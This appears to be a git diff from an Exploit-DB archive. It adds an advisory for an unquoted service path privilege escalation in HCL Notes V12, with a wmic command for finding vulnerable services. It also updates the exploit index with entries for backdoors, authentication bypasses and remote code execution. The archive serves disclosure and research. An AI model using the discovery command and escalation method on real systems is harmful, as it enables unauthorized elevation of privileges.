||||||
|
-----------------------------7028631106888453201670373694
|
||||||
|
Content-Disposition: form-data; name="_Token[unlocked]"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------7028631106888453201670373694--
|
28
exploits/windows/local/50566.txt
Normal file
28
exploits/windows/local/50566.txt
Normal file
|
@ -0,0 +1,28 @@
|
||||||
|
# Exploit Title: HCL Lotus Notes V12- Unquoted Service Path
|
||||||
|
# Exploit Author: Mert DAŞ
|
||||||
|
# Version: V12
|
||||||
|
# Date: 01/12/2021
|
||||||
|
# Vendor Homepage: https://www.hcltechsw.com/domino/download
|
||||||
|
# Tested on: Windows 10
|
||||||
|
|
||||||
|
|
||||||
|
ProcessId : 3860
|
||||||
|
Name : LNSUSvc
|
||||||
|
DisplayName : HCL Notes Smart Upgrade Hizmeti
|
||||||
|
PathName : c:\HCL\Notes\SUService.exe
|
||||||
|
StartName : LocalSystem
|
||||||
|
StartMode : Auto
|
||||||
|
State : Running
|
||||||
|
|
||||||
|
Discovery
|
||||||
|
-------------------------
|
||||||
|
C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
|
||||||
|
|
||||||
|
|
||||||
|
#Exploit:
|
||||||
|
|
||||||
|
A successful attempt would require the local user to be able to insert
|
||||||
|
their code in the system root path undetected by the OS or other security
|
||||||
|
applications where it could potentially be executed during application
|
||||||
|
startup or reboot. If successful, the local user's code would execute with
|
||||||
|
the elevated privileges of the application.
|
|
@ -11422,6 +11422,7 @@ id,file,description,date,author,type,platform,port
|
||||||
50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux,
|
50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux,
|
||||||
50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
|
50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
|
||||||
50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows,
|
50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows,
|
||||||
|
50566,exploits/windows/local/50566.txt,"HCL Lotus Notes V12 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -18571,6 +18572,10 @@ id,file,description,date,author,type,platform,port
|
||||||
50407,exploits/hardware/remote/50407.py,"Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)",1970-01-01,LiquidWorm,remote,hardware,
|
50407,exploits/hardware/remote/50407.py,"Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)",1970-01-01,LiquidWorm,remote,hardware,
|
||||||
50408,exploits/hardware/remote/50408.txt,"Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection",1970-01-01,LiquidWorm,remote,hardware,
|
50408,exploits/hardware/remote/50408.txt,"Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection",1970-01-01,LiquidWorm,remote,hardware,
|
||||||
50539,exploits/linux/remote/50539.py,"GNU gdbserver 9.2 - Remote Command Execution (RCE)",1970-01-01,"Roberto Gesteira Miñarro",remote,linux,
|
50539,exploits/linux/remote/50539.py,"GNU gdbserver 9.2 - Remote Command Execution (RCE)",1970-01-01,"Roberto Gesteira Miñarro",remote,linux,
|
||||||
|
50565,exploits/hardware/remote/50565.txt,"Auerswald COMfortel 2.8F - Authentication Bypass",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
|
||||||
|
50567,exploits/hardware/remote/50567.txt,"Auerswald COMpact 8.0B - Privilege Escalation",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
|
||||||
|
50568,exploits/hardware/remote/50568.txt,"Auerswald COMpact 8.0B - Arbitrary File Disclosure",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
|
||||||
|
50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
|
||||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
|
||||||
|
@ -44648,8 +44653,8 @@ id,file,description,date,author,type,platform,port
|
||||||
50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
|
50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
|
||||||
50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
|
50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
|
||||||
50557,exploits/php/webapps/50557.txt,"Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting",1970-01-01,"Tushar Jadhav",webapps,php,
|
50557,exploits/php/webapps/50557.txt,"Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting",1970-01-01,"Tushar Jadhav",webapps,php,
|
||||||
50559,exploits/php/webapps/50559.py,"Advanced Comment System 1.0 - Remote Command Execution (RCE)",1970-01-01,"Murillo Mejias",webapps,php,
|
|
||||||
50561,exploits/php/webapps/50561.txt,"Online Magazine Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
|
50561,exploits/php/webapps/50561.txt,"Online Magazine Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
|
||||||
50562,exploits/php/webapps/50562.txt,"WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)",1970-01-01,"Mohamed Magdy Abumusilm",webapps,php,
|
50562,exploits/php/webapps/50562.txt,"WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)",1970-01-01,"Mohamed Magdy Abumusilm",webapps,php,
|
||||||
50563,exploits/php/webapps/50563.txt,"WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Abdurrahman Erkan",webapps,php,
|
50563,exploits/php/webapps/50563.txt,"WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Abdurrahman Erkan",webapps,php,
|
||||||
50564,exploits/php/webapps/50564.txt,"WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Uriel Yochpaz",webapps,php,
|
50564,exploits/php/webapps/50564.txt,"WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Uriel Yochpaz",webapps,php,
|
||||||
|
50570,exploits/php/webapps/50570.txt,"Croogo 3.0.2 - Remote Code Execution (Authenticated)",1970-01-01,"Deha Berkin Bir",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue